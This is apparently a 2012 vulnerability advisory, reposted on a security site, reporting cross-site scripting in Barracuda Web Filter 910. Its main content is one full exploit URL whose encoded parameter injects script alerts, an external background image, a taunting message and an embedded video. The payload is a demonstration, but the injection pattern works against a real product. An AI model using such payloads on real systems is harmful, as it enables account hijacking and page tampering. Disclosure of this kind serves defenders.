Barracuda Webfilter Cross Site Scripting

2012.03.12
Credit: Sony
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Date: 9.03.2012 # Author: Sony # Software Link: http://www.barracudanetworks.com/ns/products/web-filter-overview.php # Web Browser : Mozilla Firefox # Blog : http://st2tea.blogspot.com .................................................................. http://www.barracudanetworks.com/ns/products/web-filter-overview.php http://webfilter.barracuda.com/cgi-mod/index.cgi?&user=guest&password=281c4044cabcad694d37b77b1a4752a3&et=1331648646&auth_type=Local&locale=en_US&primary_tab=BLOCK/ACCEPT&secondary_tab=content_filter&category_submit&url=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%22%3E%3Cbody%20background=%22http://www.animateit.net/data/media/54/redwaveani.gif%22%3E%3Cscript%3Ealert%28%22Because%20We%20care,%20we%27re%20Security%20aware.%20inSecurity.Ro%20by%20Sony%20aka%20SonyStyles%22%29%3C/script%3E%3Ciframe%20width=%22420%22%20height=%22315%22%20src=%22http://www.youtube.com/embed/w0ffwDYo00Q%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E&category=entertainment http://2.bp.blogspot.com/-Gcg0XVaYWpM/T1noy2Z_i1I/AAAAAAAAAto/5kFvUXCQHLQ/s1600/barr.JPG http://4.bp.blogspot.com/-I9YuSJ83K-o/T1no3jjSbYI/AAAAAAAAAt0/xSPQPQtDtNs/s1600/barr2.JPG It's not a one xss in Barracuda Web Filter 910. A week or two ago I sent a mail to Barracuda Support, asking if they were interested in a bug I found in the web filter. The replied they were very interested. Actually, I was kidding. They didn't reply at all. http://www.youtube.com/watch?v=YPwDPgqMCOs

References:

http://www.barracudanetworks.com/ns/products/web-filter-overview.php
http://www.youtube.com/watch?v=YPwDPgqMCOs


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top